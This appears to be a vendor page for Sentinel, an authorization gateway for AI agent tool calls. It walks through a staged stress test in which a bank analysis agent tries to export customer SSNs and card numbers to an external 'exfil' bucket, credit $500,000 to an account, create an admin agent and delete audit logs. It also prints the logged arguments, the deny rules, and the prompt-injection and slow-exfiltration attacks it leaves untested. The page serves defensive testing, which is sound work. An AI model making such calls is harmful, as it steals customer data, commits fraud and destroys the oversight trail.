We Ran Every AI Agent Attack We Could Think Of. 0 Breaches.

Your AI Agents Have API Access. Who's Watching Them?

AI agents authenticate once and then make thousands of autonomous tool calls with no human reviewing individual actions. They operate at machine speed with human-level API access. Traditional IAM was built for users who click buttons and type passwords. It was not designed for autonomous software making 1,000 API calls per hour.

Machine-Speed Exfiltration

A compromised agent can export your entire customer database in seconds. By the time a human notices, the data is gone. Every record. Every field.

No Intent Enforcement

An agent authorized to "read customer data" can call write, delete, and export tools. RBAC controls what endpoints exist, not what an agent actually does with them.

No Forensic Trail

When an incident occurs, there's no structured log tying agent identity to tool call to arguments to authorization decision. You're reconstructing from access logs and prayer.

Compliance Blind Spot

SOC 2 requires access controls. PCI-DSS requires audit trails. HIPAA requires access logging. AI agents bypass every control designed for human users.

The Cost of Doing Nothing

This is not theoretical risk. These are the numbers from organizations that learned the hard way.

$4.88M

Avg. Breach Cost (IBM 2024)

292

Days to Identify + Contain

$5K-100K

PCI-DSS Fine / Month

4%

GDPR: % of Global Revenue

Those numbers assume human-speed breaches. An AI agent operating autonomously can exfiltrate more data in 60 seconds than a human attacker can in 60 days. The breach cost model hasn't caught up to machine-speed threats yet.

Without Agent IAM

All 6 tool calls reach the MCP server
$500K fraudulent balance modification succeeds
Customer PII (SSN, CC#) exfiltrated to external S3
Audit logs deleted, covering attacker's tracks
No structured trail tying agent to actions
Breach discovered days or weeks later

With Sentinel

Only 2 legitimate calls forwarded upstream
Balance modification blocked before transmission
PII fields automatically redacted in audit trail
Audit deletion blocked; full trail preserved
Every action logged with 12-field forensic detail
Every violation caught in real-time (< 1ms)

The Scenario: QuantumBank Risk Analysis

QuantumBank deploys AI agents to analyze customer transaction patterns and generate risk reports. Agent risk-analyzer-7 is registered with read and analyze capabilities, scoped to a task session with a 50-call budget and two whitelisted tools.

What this test is and isn't. This is an adversarial stress test of Sentinel's authorization boundary, not a simulation of a realistic attack. Real compromised agents are subtler — they don't attempt data exfiltration, balance modification, privilege escalation, and evidence destruction in sequence. We designed this scenario to test every enforcement layer in one session. The attacks are loud by design: they prove the floor holds. Subtle attacks — like prompt injection that produces legitimate-looking tool calls, or slow exfiltration through authorized read operations — are a different threat class that requires additional layers beyond session whitelisting.

        Agent Registration
        POST /agents
      

{
  "owner": "user:quantumbank-risk-team",
  "model": "claude-opus-4-6",
  "capabilities": ["read", "analyze"],
  "trust_level": "basic"
}

// Response:
{
  "agent_id": "8b6f1275-7271-440f-ba1c-b9aa50fc0783",
  "token": "eyJ0eXAiOiJKV1Qi..."
}
      

        Task Session
        POST /sessions
      

{
  "agent_id": "8b6f1275-7271-440f-ba1c-b9aa50fc0783",
  "declared_intent": "analyze customer transaction patterns",
  "authorized_tools": ["query_transactions", "generate_risk_report"],
  "time_limit_secs": 1800,
  "call_budget": 50
}

// The agent can ONLY call query_transactions and generate_risk_report.
// Everything else is denied before it reaches the upstream server.
      

55 Milliseconds. 6 Tool Calls. The Full Story.

At 17:44:12 UTC on March 10, 2026, agent risk-analyzer-7 began its task session. The first two calls were legitimate. Then it attempted four unauthorized operations in rapid succession — data exfiltration, balance manipulation, privilege escalation, and audit destruction. Each one was blocked before a single byte reached the upstream server. These are the results.

17:44:12.010Z Allowed < 1ms

query_transactions

Queried transaction history for account ACT-7291, date range 2026-01-01 to 2026-03-10. Legitimate read operation matching declared intent. Forwarded to upstream.

17:44:12.023Z Allowed < 1ms

generate_risk_report

Generated VaR-95 risk report for portfolio PRTF-3847. Analytical operation consistent with agent's declared capabilities. Forwarded to upstream.

17:44:12.034Z Denied < 1ms

export_customer_data

Attempted to export SSN, credit card numbers, and DOB for customer CUST-19283 to s3://external-bucket/exfil/. Tool not in session whitelist. Blocked before a single byte reached upstream.

17:44:12.045Z Denied < 1ms

modify_account_balance

Attempted to credit $500,000 to account ACT-7291. Tool not in session whitelist. Write operation in read-only session. Blocked. Zero bytes transmitted to upstream.

17:44:12.055Z Denied < 1ms

create_admin_agent

Attempted privilege escalation: register a new agent with admin trust level and full read/write/delete/admin capabilities. Deny-by-default. No policy match. Delegation scope would prevent this even with one.

17:44:12.066Z Denied < 1ms

delete_audit_logs

Final move: delete all audit logs from 2026-01-01 to present, disguised as "storage optimization." Tool not whitelisted. Delete operation in read session. Blocked. The audit trail that recorded this attempt is itself protected from deletion.

The Raw Audit Trail

Every tool call produces a structured JSONL entry with agent identity, session scope, tool name, full arguments, authorization decision, matched policy, anomaly flags, and latency. This is not a summary. This is the actual data.

        audit.jsonl
        Entry #3 — Blocked Exfiltration Attempt
      

{
  "timestamp":              "2026-03-10T17:44:12.034011Z",
  "request_id":             "f7fd4108-b3ff-4514-aff3-8b138ee76eb9",
  "agent_id":               "8b6f1275-7271-440f-ba1c-b9aa50fc0783",
  "delegation_chain":       "user:quantumbank-risk-team>8b6f1275...",
  "task_session_id":        "ce4579a8-0f6d-4677-93d8-7aeee9f01fc1",
  "tool_called":            "export_customer_data (tools/call)",
  "arguments": {
    "customer_id":          "CUST-19283",
    "fields":              ["name", "ssn", "account_number", "credit_card", "dob", "address"],
    "format":              "csv",
    "destination":          "s3://external-bucket/exfil/"
  },
  "authorization_decision": "deny",
  "policy_matched":         "session-whitelist: tool not authorized",
  "anomaly_flags":          [],
  "latency_ms":             0,
  "upstream_status":        403  // Blocked — never reached upstream
}
      

        audit.jsonl
        Entry #4 — Blocked $500K Account Manipulation
      

{
  "timestamp":              "2026-03-10T17:44:12.045050Z",
  "request_id":             "555527b4-0c45-4af7-a707-12bd9e86505f",
  "agent_id":               "8b6f1275-7271-440f-ba1c-b9aa50fc0783",
  "delegation_chain":       "user:quantumbank-risk-team>8b6f1275...",
  "task_session_id":        "ce4579a8-0f6d-4677-93d8-7aeee9f01fc1",
  "tool_called":            "modify_account_balance (tools/call)",
  "arguments": {
    "account_id":           "ACT-7291",
    "amount":               500000.00,
    "reason":               "adjustment"
  },
  "authorization_decision": "deny",
  "policy_matched":         "session-whitelist: tool not authorized",
  "anomaly_flags":          [],
  "latency_ms":             0,
  "upstream_status":        403  // Blocked — never reached upstream
}
      

        audit.jsonl
        Entry #6 — Blocked Audit Tampering
      

{
  "timestamp":              "2026-03-10T17:44:12.066312Z",
  "request_id":             "639b54aa-f8ba-4d6f-afa6-4358302ae615",
  "agent_id":               "8b6f1275-7271-440f-ba1c-b9aa50fc0783",
  "delegation_chain":       "user:quantumbank-risk-team>8b6f1275...",
  "task_session_id":        "ce4579a8-0f6d-4677-93d8-7aeee9f01fc1",
  "tool_called":            "delete_audit_logs (tools/call)",
  "arguments": {
    "date_range":           "2026-01-01/2026-03-10",
    "reason":               "storage optimization"
  },
  "authorization_decision": "deny",
  "policy_matched":         "session-whitelist: tool not authorized",
  "anomaly_flags":          [],
  "latency_ms":             0,
  "upstream_status":        403  // Blocked — never reached upstream
}
      

Prometheus Metrics from This Scenario

Sentinel exports production-grade Prometheus metrics on every request. These numbers come directly from the /metrics endpoint captured during this scenario. Plug into Grafana, Datadog, or any Prometheus-compatible monitoring.

        GET /metrics
        Prometheus scrape
      

# HELP requests_total Total requests by authorization decision
# TYPE requests_total counter
requests_total{decision="allow"}  2
requests_total{decision="deny"}   4

# HELP tool_calls_total Total tool calls by tool name
# TYPE tool_calls_total counter
tool_calls_total{tool="query_transactions"}      1
tool_calls_total{tool="generate_risk_report"}     1
tool_calls_total{tool="export_customer_data"}     1
tool_calls_total{tool="modify_account_balance"}   1
tool_calls_total{tool="create_admin_agent"}       1
tool_calls_total{tool="delete_audit_logs"}        1

# HELP anomalies_total Total anomalies detected
# TYPE anomalies_total counter
anomalies_total 0

# HELP request_duration_seconds End-to-end request duration
# TYPE request_duration_seconds histogram
request_duration_seconds_bucket{le="0.005"} 6  // All 6 under 5ms
request_duration_seconds_sum   0.001
request_duration_seconds_count 6
      

How It Works: 9 Stages, Every Request

Sentinel sits between your AI agents and your MCP server. Every tool call passes through 9 inspection stages. Each stage can independently reject a request, but every stage always writes to audit. Average overhead: < 1ms per request.

1

Distributed Tracing

Unique request ID assigned. Trace context propagated to upstream. Every subsequent stage references this ID.
2

Prometheus Metrics

Request counter incremented. Latency timer started. All metrics tagged by decision outcome (allow/deny).
3

Audit Capture

Structured JSONL entry initialized with timestamp, request ID, agent ID, delegation chain. Entry finalized after all stages complete.
4

OAuth 2.1 JWT Validation

Bearer token validated against JWKS. Checks expiry, issuer, audience. Invalid token = instant 401.
5

MCP Protocol Parsing

JSON-RPC 2.0 body parsed. Tool name, arguments, and resource URI extracted. Non-MCP POST traffic rejected in strict mode.
6

Session Enforcement

Session header required for MCP traffic. Checks time limit, call budget, and tool whitelist. Expired or over-budget = 403.
7

Policy Engine

Deny-by-default evaluation. Matches on agent, trust level, capabilities, intent keywords, tools, and parameter constraints. Most-specific match wins.
8

Behavioral Anomaly Detection

Classifies operations as read/write/delete/admin. Flags when actual operations contradict declared intent. Can escalate to hard deny.
9

Forward to Upstream

If all stages pass: request forwarded to MCP server. Response returned to agent. Audit entry finalized with upstream status code.

Don't Trust Us. Verify.

Every data point on this page came from a reproducible scenario. Here are the exact commands. Run them yourself. Read the source code. If you find a way through that Sentinel doesn't catch, open an issue.

        terminal
        Reproduce the QuantumBank scenario
      

# Clone and build (requires Rust toolchain)
git clone https://github.com/ireland-samantha/sentinel.git
cd sentinel
cargo build --release

# Start the mock MCP upstream (echo server)
python3 docker/echo-server.py &

# Start Sentinel with the QuantumBank scenario config
./target/release/sentinel --config docker/scenario-quantumbank.toml &
sleep 1 && curl -sf http://localhost:8080/health && echo "Sentinel ready"

# Run all 6 tool calls — 2 allowed, 4 blocked
./docker/run-scenario.sh

# Read the audit trail yourself
cat /tmp/sentinel-scenario-audit.jsonl | jq .

# Check the metrics
curl http://localhost:8080/metrics

# Run the full test suite
cargo test --workspace
      

        scenario-quantumbank.toml
        The policy configuration
      

# This is the actual config used in this scenario.
# Two tools are allowed. Everything else is denied by default.

[[policy.policies]]
id = "allow-risk-read-tools"
effect = "allow"
allowed_tools = ["query_transactions", "generate_risk_report"]
[policy.policies.intent_match]
keywords = ["analyze"]

[[policy.policies]]
id = "deny-data-export"
effect = "deny"
allowed_tools = ["export_customer_data"]

[[policy.policies]]
id = "deny-financial-modification"
effect = "deny"
allowed_tools = ["modify_account_balance"]

[[policy.policies]]
id = "deny-privilege-escalation"
effect = "deny"
allowed_tools = ["create_admin_agent"]

[[policy.policies]]
id = "deny-audit-tampering"
effect = "deny"
allowed_tools = ["delete_audit_logs"]
      

Source code: handler.rs (middleware chain) · eval.rs (policy engine) · integration.rs (test suite)

What Sentinel Is Not

Honesty about scope is more useful than marketing about potential. Here's what Sentinel does and doesn't do.

Not a WAF

Sentinel doesn't inspect HTTP payloads for SQL injection or XSS. It operates at the MCP tool-call layer, not the HTTP layer.

Not a DLP System

Sentinel blocks unauthorized tool calls before they execute. It doesn't scan outbound data for PII patterns. The redaction is for audit entries, not traffic.

Not a Network Firewall

Sentinel is an application-layer gateway for AI agent tool calls. Network security, TLS termination, and rate limiting are complementary infrastructure.

Not Magic

Sentinel enforces policies you write. The quality of protection is bounded by the quality of your policy configuration. It gives you the enforcement engine; you provide the rules.

What This Demo Doesn't Show

The QuantumBank scenario tests authorization boundary enforcement: can an agent call tools it wasn't authorized to use? That's the foundation. But it's not the whole picture. Attack classes this demo does not cover:

● Prompt injection causing an agent to craft legitimate-looking tool calls with malicious arguments (e.g., authorized query_transactions with a wildcard filter to dump all records)
● Low-and-slow exfiltration through authorized read operations, one record at a time, staying within call budgets
● Argument-level attacks where the tool is authorized but the parameters are malicious (Sentinel's policy engine supports parameter constraints, but this scenario doesn't exercise them)

Session whitelisting catches the loud attacks. Behavioral anomaly detection (stage 8) and parameter-level policy constraints help with the subtle ones. Defense in depth means no single layer is the whole answer.

Protocol Scope

Today: MCP protocol (JSON-RPC 2.0) over HTTP. Sentinel parses tools/call, tools/list, and resources/read methods. MCP is where we started because it's the emerging standard for AI agent tool use and has the richest structured data to enforce on. Non-MCP traffic can be passed through or rejected depending on configuration.

The Industry Knows This Problem Exists

"AI agents represent a fundamentally new identity type that existing IAM frameworks were not designed to handle. Organizations need purpose-built controls for non-human autonomous actors."

ISACA, "Managing AI Agent Risk" (2025)

"The rise of AI agents creates novel security challenges: machine-speed operations, autonomous decision-making, and opaque reasoning all demand new approaches to access control and auditability."

Cloud Security Alliance, "AI Agent Security Framework" (2025)

"Traditional RBAC cannot express intent boundaries. An agent with 'read' permission can still call write endpoints unless the control plane enforces operation-type awareness."

OpenID Foundation, "Non-Human Identity Working Group" (2025)

Why This Matters Now

Anthropic, OpenAI, Google, and Microsoft all shipped agent frameworks in 2024-2025. The MCP protocol is becoming the standard interface for AI agent tool use. Enterprises are deploying autonomous agents into production workflows: code generation, customer service, data analysis, financial operations.

Every one of these deployments needs an authorization layer between "the agent has API access" and "the agent can do anything with that access." Today, almost none of them have one. The gap between AI agent deployment velocity and AI agent security infrastructure is the largest unaddressed risk surface in enterprise software.

Sentinel is purpose-built for this gap: a protocol-aware authorization gateway that understands what AI agents are doing at the tool-call level, not just the network level. Open source. Single binary. Deploys in minutes, not months.

Deploy in 5 Minutes

Sentinel is a single Rust binary. No agents to install, no sidecars, no service mesh. Put it in front of your MCP server. Every tool call is now secured, logged, and auditable.

        terminal
        3 commands to production
      

# 1. Install (Linux and macOS, amd64 and arm64)
OS=$(uname -s | tr '[:upper:]' '[:lower:]' | sed 's/darwin/macos/') \
  ARCH=$(uname -m | sed 's/x86_64/amd64/') && \
  curl -fsSL "https://github.com/ireland-samantha/sentinel/releases/latest/download/sentinel-${OS}-${ARCH}" \
  -o /usr/local/bin/sentinel && chmod +x /usr/local/bin/sentinel

# 2. Configure
cat > sentinel.toml <<'EOF'
[proxy]
upstream_url = "http://your-mcp-server:8081"

[audit]
enabled = true
file_path = "/var/log/sentinel/audit.jsonl"
redaction_patterns = ["password", "ssn", "credit_card"]

[admin]
api_key = "your-secure-key"
EOF

# 3. Run
sentinel --config sentinel.toml
INFO proxy listening proxy_addr=0.0.0.0:8080
INFO admin API listening admin_addr=0.0.0.0:3000